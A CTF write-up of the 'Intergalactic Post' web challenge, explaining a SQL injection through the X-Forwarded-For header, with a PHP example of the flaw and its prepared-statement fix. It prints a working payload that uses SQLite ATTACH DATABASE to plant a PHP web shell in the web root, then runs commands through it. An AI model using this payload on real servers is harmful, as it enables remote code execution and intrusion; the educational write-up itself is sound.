Cyber Apocalypse 2022 — Intergalactic Post

Fahri Korkmaz
2 min read · May 30, 2022

The challenge was from the Web category, and we were provided with the source code of the web application.

Vulnerability

The vulnerability is in the Database.php file, which passes the user input unsanitized into a SQL query:

The IP address comes from SubscriberModel.php, which reads it from the HTTP headers, so it is fully attacker-controlled.
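To make the defect concrete, here is an added example (my own illustration, not the challenge's Database.php or SubscriberModel.php; the table and column names are assumed) that places the vulnerable string-built INSERT next to a prepared-statement version and adds validation of the forwarded-for header:

```php
<?php
// Added example, not the challenge's code. Table and column names are assumed.
// Contrasts the exploitable query-building pattern with a hardened one.

declare(strict_types=1);

// In-memory SQLite so the example runs stand-alone.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subscribers (email TEXT NOT NULL, ip_address TEXT NOT NULL)');

// VULNERABLE: the header value is interpolated straight into the SQL text.
// pdo_sqlite's exec() runs every statement in the string, so a quote in the
// value terminates the INSERT and any statements appended after it run with
// the web server's privileges (this is what the writeup abuses).
function insertSubscriberVulnerable(PDO $db, string $email, string $ip): void
{
    $db->exec("INSERT INTO subscribers (email, ip_address) VALUES ('$email', '$ip')");
}

// FIXED: bound parameters keep data and SQL apart. The driver never parses the
// value as SQL, so quotes and semicolons are stored literally.
function insertSubscriber(PDO $db, string $email, string $ip): void
{
    $stmt = $db->prepare('INSERT INTO subscribers (email, ip_address) VALUES (:email, :ip)');
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->bindValue(':ip', $ip, PDO::PARAM_STR);
    $stmt->execute();
}

// Second layer: X-Forwarded-For is client-supplied unless a trusted proxy
// overwrites it. Accept only a syntactically valid IP address and fall back to
// the socket peer address otherwise.
function clientIp(array $server): string
{
    $candidate = '';
    if (isset($server['HTTP_X_FORWARDED_FOR'])) {
        // The header may be a comma-separated chain; take the first entry.
        $candidate = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
    }
    if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $server['REMOTE_ADDR'] ?? '0.0.0.0';
}

// Constructed request (not a real capture): the header carries a quote and a
// trailing statement, the same shape as the injection described above.
$fakeServer = [
    'REMOTE_ADDR'          => '198.51.100.7',
    'HTTP_X_FORWARDED_FOR' => "x', 'x'); SELECT 1;--",
];

// With validation the malformed header is rejected and REMOTE_ADDR is stored.
insertSubscriber($db, 'user@example.com', clientIp($fakeServer));

// Even if validation were skipped, the prepared statement stores the raw
// string as data instead of executing the appended statement.
insertSubscriber($db, 'user@example.com', $fakeServer['HTTP_X_FORWARDED_FOR']);

// Inspect what actually landed in the database: two rows, and only the
// subscribers table exists in sqlite_master.
$rows = $db->query('SELECT ip_address FROM subscribers')->fetchAll(PDO::FETCH_COLUMN);
var_dump($rows);

$tables = $db->query("SELECT name FROM sqlite_master WHERE type = 'table'")
             ->fetchAll(PDO::FETCH_COLUMN);
var_dump($tables);
```

The prepared statement alone closes the injection; the header validation is defence in depth, because a value that is not an IP address has no business in an `ip_address` column in the first place. When reviewing code of this kind, grep for `exec(` and `query(` calls whose argument is built with string interpolation or concatenation.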

Command Injection

From the source code we could see that the web app uses a SQLite database. I injected the following SQL into the X-Forwarded-For header:

foo', 'foo');ATTACH DATABASE '/www/test3.php' AS lol;CREATE TABLE lol.pwn (dataz text);INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>"); ?>');--

Next, I first enumerated the / directory with ls, so that I knew the name of the flag, because it gets a random suffix after flag_. For that I sent a GET request with the cmd parameter set to “ls”. After that I was able to retrieve the flag by running “cat <flag name>”, again by sending a GET request and setting the cmd parameter:
